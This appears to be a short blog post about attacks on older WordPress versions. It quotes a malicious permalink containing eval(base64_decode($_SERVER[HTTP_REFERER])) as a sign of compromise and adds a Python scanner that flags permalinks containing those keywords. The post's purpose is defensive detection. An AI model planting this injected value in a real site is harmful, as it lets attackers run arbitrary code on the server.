Older versions of WordPress have security holes and are under attack.
Scoble’s WordPress blog was hacked, after which he isn’t feeling very safe. The worst part – he didn’t have a backup!
Here’s how you can check if you’re already being attacked:
There are two clues that your WordPress site has been attacked.
There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”
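The permalink check described above can be automated. The following is an added example, not code from the original post or from WordPress: it percent-decodes each permalink string and flags those containing the two keywords. The function names and the sample list are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# The two keywords the post names as the giveaway, matched as whole words
# so that ordinary slugs such as "evaluation" or "medieval" are not flagged.
SUSPICIOUS = re.compile(r"\b(eval|base64_decode)\b", re.IGNORECASE)
MAX_DECODE_ROUNDS = 5  # assumption: enough to unwrap nested percent-encoding

def fully_unquote(value):
    """Percent-decode repeatedly so %65val and %2565val both become 'eval'."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)  # malformed escapes like '%&' are left as-is
        if decoded == value:
            break
        value = decoded
    return value

def find_keywords(permalink):
    """Return the sorted suspicious keywords present in one permalink."""
    decoded = fully_unquote(permalink)
    return sorted({m.group(1).lower() for m in SUSPICIOUS.finditer(decoded)})

def scan(permalinks):
    """Map each flagged permalink to the keywords found in it."""
    return {p: hits for p in permalinks if (hits := find_keywords(p))}

# The tampered permalink quoted in the post.
PAGE_EXAMPLE = ("example.com/category/post-title/%&(%7B$%7Beval(base64_decode"
                "($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/")

# Constructed sample input: clean slugs plus a double-encoded variant.
SAMPLE = [
    "example.com/category/post-title/",
    "example.com/2009/09/evaluation-of-plugins/",
    "example.com/history/medieval-blogging/",
    "example.com/post/%2565val(x)/",
    PAGE_EXAMPLE,
]

if __name__ == "__main__":
    for link, hits in scan(SAMPLE).items():
        print("SUSPICIOUS", hits, link)
```

Feed it the permalinks your site actually produces, for example the links in your sitemap or feed, in place of the constructed sample.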
Here’s a blog post from WordPress on How to Keep Your WordPress Secure:
A stitch in time saves nine. I couldn’t sew my way out of a bag, but it’s true advice for bloggers as well — a little bit of work on an upgrade now saves a lot of work fixing something later.